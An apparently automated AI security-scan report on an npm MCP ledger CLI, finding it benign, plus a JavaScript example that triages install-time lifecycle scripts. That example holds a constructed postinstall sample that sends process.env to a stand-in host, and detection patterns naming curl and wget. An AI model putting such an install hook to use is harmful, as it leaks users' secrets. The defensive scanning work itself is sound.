AI Security Review
scanned 3d ago · by lpm-firewall-ai

No confirmed malicious attack surface was established. Risky primitives are present but align with a local MCP ledger CLI that registers user-selected clients and optionally syncs encrypted events.
Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install runs postinstall; user-invoked CLI commands activate config writes, local server, sync, pairing, or keychain operations.
Impact
Install may rebuild better-sqlite3; explicit commands may modify user MCP client configs, local ledger files, or keychain entries, or sync encrypted ledger data to the user-configured cloud_endpoint.
Mechanism
native dependency rebuild plus explicit MCP/local-ledger management
Rationale
Static inspection found a CLI for local MCP memory with install-time native rebuild and user-invoked config/keychain/sync features, but no concrete unconsented exfiltration or control-surface hijack. Scanner lifecycle and network findings are explained by package-aligned better-sqlite3 rebuild, localhost MCP transport, and user-configured sync.
Evidence
- package.json
- dist/index.js
- dist/adapters/terminal/codex.js
- dist/adapters/terminal/shared.js
- dist/sync.js
- dist/transport.js
- dist/keychain.js
- node_modules/better-sqlite3/build
- node_modules/usrcp-local/node_modules/better-sqlite3/build
- node_modules/usrcp-stream/node_modules/better-sqlite3/build
- ~/.usrcp/**
- ~/.codex/config.toml
- ~/.claude.json
- ~/.cursor/mcp.json
- ~/.continue/config.json
Network endpoints (2)
- 127.0.0.1:<port>/mcp
- user-configured cloud_endpoint
Decision evidence
public snapshot: AI called this Clean (Benign) at 86.0% confidence, with medium false-positive risk.
Evidence for block
- package.json defines a postinstall script that deletes the better-sqlite3 build directories (the top-level one and the copies nested under usrcp-local and usrcp-stream) and then runs npm rebuild better-sqlite3.
- dist/index.js writes MCP client config files during explicit init/adapter commands.
- dist/keychain.js uses child_process spawnSync for OS keychain commands.
- dist/sync.js can push/pull encrypted ledger events to user-configured cloud_endpoint.
Evidence against
- Postinstall is limited to better-sqlite3 native rebuild paths and does not harvest data or contact a hardcoded endpoint.
- Agent config writes are package-aligned MCP registration and require user-invoked init/adapter setup commands.
- Network sync requires cloud_endpoint configured by the user; no fixed exfiltration host found.
- Passphrase/env handling exists only to unlock the local ledger; the CLI deletes USRCP_PASSPHRASE from its environment after reading it.
- No install-time credential collection, persistence beyond intended configs, or hidden payload loading found.
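As an added example (not code from the scanned package or from lpm-firewall-ai), the check below reproduces the decision the Evidence for/against lists walk through: an install-time lifecycle script is a finding on its own, but it only becomes a block when it reaches the network, reads the environment, or touches paths outside the three better-sqlite3 build directories named in the Evidence list. The hook names, regexes, path allowlist and both sample manifests are this example's own assumptions; the first sample is modeled on the postinstall the report describes, the second on the hardcoded-endpoint pattern the report says it did not find.

```javascript
// Added example (not code from the scanned package): triage npm lifecycle
// scripts the way a reviewer would before letting `npm install` run them.
// Hook list, regexes, allowlist and sample manifests are assumptions of this
// example, modeled on the report's Evidence for/against lists.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Directories an install-time better-sqlite3 rebuild is expected to touch
// (the three build paths named in the report). Anything else is a finding.
const ALLOWED_PATHS = [
  /^node_modules\/(?:[^/]+\/node_modules\/)?better-sqlite3\/build$/,
];

const INLINE_CODE_RE = /\bnode\s+(?:-e|--eval)\b/;
const NETWORK_RE = /https?:\/\/|\bcurl\b|\bwget\b|\bfetch\(|\.request\(/;
const ENV_READ_RE = /process\.env|\$\{?[A-Z][A-Z0-9_]+\}?/;

// Pull path-like tokens out of a shell command. Quotes, brackets and the
// backslash escapes of an inline `node -e` payload are treated as separators;
// URLs are handled by NETWORK_RE and skipped here.
function extractPaths(command) {
  return command
    .split(/[\s"'`\[\](){},;|&]+/)
    .map((t) => t.replace(/\\/g, ""))
    .filter((t) => t.includes("/") && !/^[a-z]+:\/\//.test(t));
}

function triageHook(hook, command) {
  const reasons = [];
  if (INLINE_CODE_RE.test(command)) reasons.push("inline-code");
  if (NETWORK_RE.test(command)) reasons.push("network");
  if (ENV_READ_RE.test(command)) reasons.push("env-read");
  const strayPaths = extractPaths(command).filter(
    (p) => !ALLOWED_PATHS.some((re) => re.test(p)),
  );
  if (strayPaths.length) reasons.push("path-outside-allowlist:" + strayPaths.join(","));
  // Inline code alone (a native rebuild helper) warrants review; any network
  // use, environment read or stray path at install time is a block.
  const blocking = reasons.some((r) => r !== "inline-code");
  return { hook, verdict: blocking ? "block" : "review", reasons };
}

function triageLifecycleScripts(packageJsonText) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  const hooks = LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === "string")
    .map((h) => triageHook(h, scripts[h]));
  let verdict = "clean";
  if (hooks.some((h) => h.verdict === "block")) verdict = "block";
  else if (hooks.length) verdict = "review";
  return { verdict, hooks };
}

// Constructed sample 1: the shape the report describes (delete the three
// better-sqlite3 build dirs, then `npm rebuild better-sqlite3`).
const SAMPLE_LEDGER_CLI = JSON.stringify({
  name: "sample-ledger-cli",
  scripts: {
    postinstall:
      'node -e "const fs=require(\\"fs\\"); for (const p of [' +
      '\\"node_modules/better-sqlite3/build\\",' +
      '\\"node_modules/usrcp-local/node_modules/better-sqlite3/build\\",' +
      '\\"node_modules/usrcp-stream/node_modules/better-sqlite3/build\\"' +
      ']) fs.rmSync(p,{recursive:true,force:true})" && npm rebuild better-sqlite3',
  },
});

// Constructed sample 2: what the report says it did NOT find, an install hook
// that ships the environment to a hardcoded host (.invalid never resolves).
const SAMPLE_EXFIL = JSON.stringify({
  name: "sample-exfil",
  scripts: {
    postinstall:
      'node -e "require(\'https\').request(\'https://example.invalid/c\',{method:\'POST\'}).end(JSON.stringify(process.env))"',
  },
});

if (typeof module !== "undefined" && require.main === module) {
  console.log(JSON.stringify(triageLifecycleScripts(SAMPLE_LEDGER_CLI), null, 2));
  console.log(JSON.stringify(triageLifecycleScripts(SAMPLE_EXFIL), null, 2));
}
```

The first sample comes back as review with the single reason inline-code, the second as block with network and env-read. Whatever the verdict, the low-risk way to install a package like this is npm ci --ignore-scripts followed by an explicit npm rebuild better-sqlite3, which produces the same native module without executing the inline postinstall at all.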
Behavioral surface
- ChildProcess
- Crypto
- DynamicRequire
- EnvironmentVars
- Filesystem
- Network
- HighEntropyStrings
- UrlStrings
Source & flagged code
3 flagged

package.json
- scripts.postinstall = node -e "const fs=require(\"fs\"); for (const p of [\"node_modules/better-sqlite3/build\",\"node_modules/usrcp-local/node_modules/better-sqlite3/build\",\"node_modules/usrcp-stream...
Critical
Red Install Lifecycle Script
Install-time lifecycle script matches a deterministic static-gate block pattern.
package.json · scripts.postinstall (quoted under Source & flagged code)
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.json

dist/server.js
L4: exports.createServer = createServer;
L5: const mcp_js_1 = require("@[redacted].js");
L6: const zod_1 = require("zod");
Medium
Dynamic Require
Package source references dynamic require/import behavior. Caveat: the excerpt shown above from dist/server.js (L4 to L6) contains only string-literal require calls, so the construct this rule matched is not visible there; confirm it against the full file before giving this finding weight.
dist/server.js · L4

Findings
1 Critical · 1 High · 4 Medium · 4 Low
- Critical · Red Install Lifecycle Script · package.json
- High · Install Time Lifecycle Scripts · package.json
- Medium · Dynamic Require · dist/server.js
- Medium · Network
- Medium · Environment Vars
- Medium · Structural Risk Force Deep Review
- Low · Scripts Present
- Low · Filesystem
- Low · High Entropy Strings
- Low · Url Strings